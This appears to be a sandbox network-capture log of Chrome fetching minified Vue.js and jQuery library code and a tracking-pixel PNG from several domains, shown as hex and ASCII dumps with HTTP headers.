                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 72 6f 70 3a 20 22 27 2b 65 2b 27 22 27 2c 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 6e 7c 7c 74 2e 72 65 71 75 69 72 65 64 29 7b 76 61 72 20 6f 3d 74 2e 74 79 70 65 2c 61 3d 21 6f 7c 7c 21 30 3d 3d 3d 6f 2c 75 3d 5b 5d 3b 69 66 28 6f 29 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 7c 7c 28 6f 3d 5b 6f 5d 29 3b 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 6f 2e 6c 65 6e 67 74 68 26 26 21 61 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 61 74 28 6e 2c 6f 5b 73 5d 29 3b 75 2e 70 75 73 68 28 63 2e 65 78 70 65 63 74 65 64 54 79 70 65 7c 7c 22 22 29 2c 61 3d 63 2e 76 61 6c 69 64 7d 7d 69 66 28 21 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 69 61 28 27 49 6e 76 61 6c 69 64 20 70 72 6f 70 3a 20 74 79 70 65 20 63 68 65 63 6b 20 66 61 69 6c 65 64 20 66 6f 72 20 70 72 6f 70 20 22
                                                                                                                                                          Data Ascii: rop: "'+e+'"',r);if(null!=n||t.required){var o=t.type,a=!o||!0===o,u=[];if(o){Array.isArray(o)||(o=[o]);for(var s=0;s<o.length&&!a;s++){var c=at(n,o[s]);u.push(c.expectedType||""),a=c.valid}}if(!a)return void ia('Invalid prop: type check failed for prop "
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 20 61 3d 53 65 28 6f 2c 74 2c 65 2c 6e 2c 69 2c 63 29 3b 72 65 74 75 72 6e 20 61 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 28 61 2e 66 6e 53 63 6f 70 65 49 64 3d 75 2e 5f 73 63 6f 70 65 49 64 2c 61 2e 66 6e 43 6f 6e 74 65 78 74 3d 72 29 2c 61 7d 3a 74 68 69 73 2e 5f 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 74 2c 65 2c 6e 2c 72 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 74 2c 65 2c 6e 2c 72 2c 69 29 7b 76 61 72 20 61 3d 74 2e 6f 70 74 69 6f 6e 73 2c 75 3d 7b 7d 2c 73 3d 61 2e 70 72 6f 70 73 3b 69 66 28 6f 28 73 29 29 66 6f 72 28 76 61 72 20 63 20 69 6e 20 73 29 75 5b 63 5d 3d 72 74 28 63 2c 73 2c 65 7c 7c 78 6f 29 3b 65 6c 73 65 20 6f 28 6e 2e 61 74 74 72 73 29 26 26 41 65
                                                                                                                                                          Data Ascii: a=Se(o,t,e,n,i,c);return a&&!Array.isArray(a)&&(a.fnScopeId=u._scopeId,a.fnContext=r),a}:this._c=function(t,e,n,r){return Se(o,t,e,n,r,c)}}function $e(t,e,n,r,i){var a=t.options,u={},s=a.props;if(o(s))for(var c in s)u[c]=rt(c,s,e||xo);else o(n.attrs)&&Ae
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 63 74 73 20 77 69 74 68 20 76 2d 6d 6f 64 65 6c 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 65 6c 65 6d 65 6e 74 20 62 65 63 61 75 73 65 20 74 68 65 20 6c 61 74 74 65 72 20 61 6c 72 65 61 64 79 20 65 78 70 61 6e 64 73 20 74 6f 20 61 20 76 61 6c 75 65 20 62 69 6e 64 69 6e 67 20 69 6e 74 65 72 6e 61 6c 6c 79 27 29 7d 7d 76 61 72 20 73 3d 72 7c 7c 7b 7d 2c 63 3d 73 2e 6c 61 7a 79 2c 6c 3d 73 2e 6e 75 6d 62 65 72 2c 66 3d 73 2e 74 72 69 6d 2c 70 3d 21 63 26 26 22 72 61 6e 67 65 22 21 3d 3d 69 2c 64 3d 63 3f 22 63 68 61 6e 67 65 22 3a 22 72 61 6e 67 65 22 3d 3d 3d 69 3f 4b 75 3a 22 69 6e 70 75 74 22 2c 68 3d 22 24 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 22 3b 66 26 26 28 68 3d 22 24 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 2e 74 72 69 6d
                                                                                                                                                          Data Ascii: cts with v-model on the same element because the latter already expands to a value binding internally')}}var s=r||{},c=s.lazy,l=s.number,f=s.trim,p=!c&&"range"!==i,d=c?"change":"range"===i?Ku:"input",h="$event.target.value";f&&(h="$event.target.value.trim
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 2d 69 66 2e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 64 69 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29 7b 69 66 28 31 3d 3d 3d 65 5b 6e 5d 2e 74 79 70 65 29 72 65 74 75 72 6e 20 65 5b 6e 5d 3b 22 70 72 6f 64 75 63 74 69 6f 6e 22 21 3d 3d 74 2e 65 6e 76 2e 4e 4f 44 45 5f 45 4e 56 26 26 22 20 22 21 3d 3d 65 5b 6e 5d 2e 74 65 78 74 26 26 47 73 28 27 74 65 78 74 20 22 27 2b 65 5b 6e 5d 2e 74 65 78 74 2e 74 72 69 6d 28 29 2b 27 22 20 62 65 74 77 65 65 6e 20 76 2d 69 66 20 61 6e 64 20 76 2d 65 6c 73 65 28 2d 69 66 29 20 77 69 6c 6c 20 62 65 20 69 67 6e 6f 72 65 64 2e 27 29 2c 65 2e 70 6f 70 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 69 28 74 2c 65 29 7b 74 2e 69 66 43 6f 6e 64 69 74 69 6f 6e 73 7c 7c 28 74 2e 69 66 43 6f 6e 64
                                                                                                                                                          Data Ascii: -if.")}function di(e){for(var n=e.length;n--;){if(1===e[n].type)return e[n];"production"!==t.env.NODE_ENV&&" "!==e[n].text&&Gs('text "'+e[n].text.trim()+'" between v-if and v-else(-if) will be ignored.'),e.pop()}}function hi(t,e){t.ifConditions||(t.ifCond
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 51 6f 26 26 28 51 6f 3d 21 50 6f 26 26 21 7a 6f 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 22 73 65 72 76 65 72 22 3d 3d 3d 6e 2e 70 72 6f 63 65 73 73 2e 65 6e 76 2e 56 55 45 5f 45 4e 56 29 2c 51 6f 7d 2c 6e 61 3d 50 6f 26 26 77 69 6e 64 6f 77 2e 5f 5f 56 55 45 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2c 72 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 28 53 79 6d 62 6f 6c 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 53 28 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 29 3b 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 65 74 26 26
                                                                                                                                                          Data Ascii: unction(){return void 0===Qo&&(Qo=!Po&&!zo&&void 0!==n&&"server"===n.process.env.VUE_ENV),Qo},na=Po&&window.__VUE_DEVTOOLS_GLOBAL_HOOK__,ra="undefined"!=typeof Symbol&&S(Symbol)&&"undefined"!=typeof Reflect&&S(Reflect.ownKeys);ta="undefined"!=typeof Set&&
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 73 6f 75 72 63 65 2c 63 61 6e 76 61 73 2c 73 63 72 69 70 74 2c 6e 6f 73 63 72 69 70 74 2c 64 65 6c 2c 69 6e 73 2c 63 61 70 74 69 6f 6e 2c 63 6f 6c 2c 63 6f 6c 67 72 6f 75 70 2c 74 61 62 6c 65 2c 74 68 65 61 64 2c 74 62 6f 64 79 2c 74 64 2c 74 68 2c 74 72 2c 62 75 74 74 6f 6e 2c 64 61 74 61 6c 69 73 74 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 69 6e 70 75 74 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6d 65 74 65 72 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 6f 75 74 70 75 74 2c 70 72 6f 67 72 65 73 73 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 64 65 74 61 69 6c 73 2c 64 69 61 6c 6f 67 2c 6d 65 6e 75 2c 6d 65 6e 75 69 74 65 6d 2c 73 75 6d 6d 61 72 79 2c 63 6f 6e 74 65 6e 74 2c 65 6c 65 6d 65 6e 74 2c 73 68 61 64 6f 77 2c 74 65 6d 70 6c 61
                                                                                                                                                          Data Ascii: source,canvas,script,noscript,del,ins,caption,col,colgroup,table,thead,tbody,td,th,tr,button,datalist,fieldset,form,input,label,legend,meter,optgroup,option,output,progress,select,textarea,details,dialog,menu,menuitem,summary,content,element,shadow,templa
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 21 5c 2d 2d 2f 2c 57 73 3d 2f 5e 3c 21 5c 5b 2f 2c 5a 73 3d 21 31 3b 22 78 22 2e 72 65 70 6c 61 63 65 28 2f 78 28 2e 29 3f 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 5a 73 3d 22 22 3d 3d 3d 65 7d 29 3b 76 61 72 20 47 73 2c 4b 73 2c 4a 73 2c 58 73 2c 51 73 2c 74 63 2c 65 63 2c 6e 63 2c 72 63 2c 69 63 2c 6f 63 2c 61 63 3d 6d 28 22 73 63 72 69 70 74 2c 73 74 79 6c 65 2c 74 65 78 74 61 72 65 61 22 2c 21 30 29 2c 75 63 3d 7b 7d 2c 73 63 3d 7b 22 26 6c 74 3b 22 3a 22 3c 22 2c 22 26 67 74 3b 22 3a 22 3e 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 61 6d 70 3b 22 3a 22 26 22 2c 22 26 23 31 30 3b 22 3a 22 5c 6e 22 2c 22 26 23 39 3b 22 3a 22 5c 74 22 7d 2c 63 63 3d 2f 26 28 3f 3a 6c 74 7c 67 74 7c 71 75 6f 74 7c 61 6d 70 29 3b 2f 67 2c 6c 63 3d 2f 26
                                                                                                                                                          Data Ascii: !\--/,Ws=/^<!\[/,Zs=!1;"x".replace(/x(.)?/g,function(t,e){Zs=""===e});var Gs,Ks,Js,Xs,Qs,tc,ec,nc,rc,ic,oc,ac=m("script,style,textarea",!0),uc={},sc={"&lt;":"<","&gt;":">","&quot;":'"',"&amp;":"&","&#10;":"\n","&#9;":"\t"},cc=/&(?:lt|gt|quot|amp);/g,lc=/&
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 20 74 79 70 65 3a 20 22 2b 61 2b 22 2e 20 53 69 6c 65 6e 74 20 6f 70 74 69 6f 6e 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 20 55 73 65 20 74 68 65 20 66 69 6c 74 65 72 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 74 68 65 20 76 75 65 2d 64 65 76 74 6f 6f 6c 73 22 29 7d 2c 56 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 69 3d 78 28 65 2c 6e 29 2c 6f 3d 69 2e 74 79 70 65 2c 61 3d 69 2e 70 61 79 6c 6f 61 64 2c 75 3d 7b 74 79 70 65 3a 6f 2c 70 61 79 6c 6f 61 64 3a 61 7d 2c 73 3d 74 68 69 73 2e 5f 61 63 74 69 6f 6e 73 5b 6f 5d 3b 72 65 74 75 72 6e 20 73 3f 28 74 68 69 73 2e 5f 61 63 74 69 6f 6e 53 75 62 73 63 72 69 62 65 72 73 2e 66 6f 72 45 61 63 68
                                                                                                                                                          Data Ascii: type: "+a+". Silent option has been removed. Use the filter functionality in the vue-devtools")},V.prototype.dispatch=function(e,n){var r=this,i=x(e,n),o=i.type,a=i.payload,u={type:o,payload:a},s=this._actions[o];return s?(this._actionSubscribers.forEach
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 28 29 3b 72 65 74 75 72 6e 7b 78 3a 69 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2d 65 2e 78 2c 79 3a 69 2e 74 6f 70 2d 72 2e 74 6f 70 2d 65 2e 79 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 74 29 7b 72 65 74 75 72 6e 20 6e 74 28 74 2e 78 29 7c 7c 6e 74 28 74 2e 79 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 30 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 74 29 7b 72 65 74 75 72 6e 22 6e 75
                                                                                                                                                          Data Ascii: ();return{x:i.left-r.left-e.x,y:i.top-r.top-e.y}}function Q(t){return nt(t.x)||nt(t.y)}function tt(t){return{x:nt(t.x)?t.x:window.pageXOffset,y:nt(t.y)?t.y:window.pageYOffset}}function et(t){return{x:nt(t.x)?t.x:0,y:nt(t.y)?t.y:0}}function nt(t){return"nu


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          194192.168.2.54993823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC362OUTGET /cc.png?r=9636637722 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC571INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[17],EU-GER-frankfurt-EDGE4-CACHE2[13,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE27[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 23b5d77336dd5773f31442acff9be53b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          195192.168.2.54993723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC535OUTGET /pc/lib/jquery.min-1.9.1.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 92630
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Jan 2018 01:18:42 GMT
                                                                                                                                                          ETag: "5a711972-169d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE15[13],EU-FRA-paris-GLOBAL1-CACHE2[0,TCP_HIT,12],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464142
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: eb9873601ee28c9d0a1f64b8cb6578e7
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127858
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC15752INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 32 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 2f 2f 40 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6a 71 75 65 72 79 2e 6d 69 6e 2e 6d 61 70 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 79 70 65 6f 66 20 74 2c 6f 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2c 73 3d 65 2e 6a 51 75 65 72 79 2c 75 3d 65 2e 24 2c 6c 3d 7b 7d 2c 63 3d 5b 5d 2c 70 3d 22 31 2e 39 2e 31 22 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 64 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 73 6c 69 63 65 2c 67 3d 63 2e 69 6e 64 65 78 4f
                                                                                                                                                          Data Ascii: /*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license//@ sourceMappingURL=jquery.min.map*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexO
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 29 7d 29 3a 62 2e 61 63 63 65 73 73 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 74 3f 6f 3f 57 28 6f 2c 65 2c 62 2e 64 61 74 61 28 6f 2c 65 29 29 3a 6e 75 6c 6c 3a 28 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 2c 6e 29 7d 29 2c 74 29 7d 2c 6e 75 6c 6c 2c 6e 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2c 65 29
                                                                                                                                                          Data Ascii: this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.removeData(this,e)
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 70 65 3a 74 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2c 69 3d 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 2c 6f 3d 65 2e 68 61 6e 64 6c 65 4f 62 6a 3b 0a 72 65 74 75 72 6e 28 21 69 7c 7c 69 21 3d 3d 72 26 26 21 62 2e 63 6f 6e 74 61 69 6e 73 28 72 2c 69 29 29 26 26 28 65 2e 74 79 70 65 3d 6f 2e 6f 72 69 67 54 79 70 65 2c 6e 3d 6f 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 2e 74 79 70 65 3d 74 29 2c 6e 7d 7d 7d 29 2c 62 2e 73 75 70 70 6f 72 74 2e 73 75 62 6d 69 74 42 75 62 62 6c 65 73 7c 7c 28 62 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 2e 6e 6f 64
                                                                                                                                                          Data Ascii: pe:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function(){return b.nod
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 30 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 31 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 2d 2d 72 3e 3d 30 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 67 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 74 3e 2b 2b 72 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65
                                                                                                                                                          Data Ascii: function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);re
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 65 74 65 20 6e 5b 75 5d 3a 74 79 70 65 6f 66 20 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 21 3d 3d 69 3f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 75 29 3a 6e 5b 75 5d 3d 6e 75 6c 6c 2c 63 2e 70 75 73 68 28 6f 29 29 7d 7d 7d 29 3b 76 61 72 20 50 74 2c 52 74 2c 57 74 2c 24 74 3d 2f 61 6c 70 68 61 5c 28 5b 5e 29 5d 2a 5c 29 2f 69 2c 49 74 3d 2f 6f 70 61 63 69 74 79 5c 73 2a 3d 5c 73 2a 28 5b 5e 29 5d 2a 29 2f 2c 7a 74 3d 2f 5e 28 74 6f 70 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 6c 65 66 74 29 24 2f 2c 58 74 3d 2f 5e 28 6e 6f 6e 65 7c 74 61 62 6c 65 28 3f 21 2d 63 5b 65 61 5d 29 2e 2b 29 2f 2c 55 74 3d 2f 5e 6d 61 72 67 69 6e 2f 2c 56 74 3d 52 65 67 45 78 70 28 22 5e 28 22 2b 78 2b 22 29 28 2e 2a 29 24 22 2c 22 69 22 29 2c 59 74 3d 52
                                                                                                                                                          Data Ascii: ete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*)$","i"),Yt=R
                                                                                                                                                          2024-06-09 22:40:58 UTC11342INData Raw: 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 69 73 4c 6f 63 61 6c 26 26 49 6e 28 29 7c 7c 7a 6e 28 29 7d 3a 49 6e 2c 52 6e 3d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 2c 62 2e 73 75 70 70 6f 72 74 2e 63 6f 72 73 3d 21 21 52 6e 26 26 22 77 69 74 68 43 72 65 64
                                                                                                                                                          Data Ascii: ry{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!Rn&&"withCred


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          196192.168.2.549939163.181.131.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC557OUTGET /ocs/zbw?r=8092400775 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
